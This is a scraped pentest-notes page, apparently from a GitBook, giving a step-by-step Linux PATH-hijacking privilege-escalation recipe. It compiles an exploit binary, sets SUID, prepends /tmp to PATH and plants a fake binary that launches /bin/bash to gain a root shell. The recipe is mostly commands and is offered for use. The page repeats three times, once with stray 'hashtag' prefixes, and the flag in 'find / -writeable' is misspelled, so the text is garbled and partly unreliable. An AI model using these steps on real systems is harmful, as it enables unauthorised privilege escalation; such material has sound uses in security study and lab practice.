PATH

Example:

echo $PATH

Questions before using this privesc vector:

1: What folders are located under $PATH?

2: Does your current user have write privileges for any of these folders?

3: Can you modify $PATH?

4: Is there a script/app you can start that will be affected by this vulnerability?

Example script is at root shells directory in this repository:

Compilation:

gcc path_exp.c -o path -w

Give SUID bit

chmod u+s path

Find writeable directories

find / -writeable 2>/dev/null

Add /tmp to PATH

export PATH=/tmp:$PATH

Go to /tmp directory

cd /tmp

Insert bash binary execution command in our example file

echo "/bin/bash" > example

Give execute permissions

chmod 777 example

Run file

./path

PreviousOpenVPN Privilege Escalation NextPasspie password manager

Last updated 8 months ago

hashtagExample:

hashtagecho $PATH

hashtagQuestions before using this privesc vector:

hashtag1: What folders are located under $PATH?

hashtag2: Does your current user have write privileges for any of these folders?

hashtag3: Can you modify $PATH?

hashtag4: Is there a script/app you can start that will be affected by this vulnerability?

hashtagExample script is at root shells directory in this repository:

hashtagCompilation:

hashtagGive SUID bit

hashtagFind writeable directories

hashtagAdd /tmp to PATH

hashtagGo to /tmp directory

hashtagInsert bash binary execution command in our example file

hashtagGive execute permissions

hashtagRun file

Example:

echo $PATH

Questions before using this privesc vector:

1: What folders are located under $PATH?

2: Does your current user have write privileges for any of these folders?

3: Can you modify $PATH?

4: Is there a script/app you can start that will be affected by this vulnerability?

Example script is at root shells directory in this repository:

Compilation:

Give SUID bit

Find writeable directories

Add /tmp to PATH

Go to /tmp directory

Insert bash binary execution command in our example file

Give execute permissions

Run file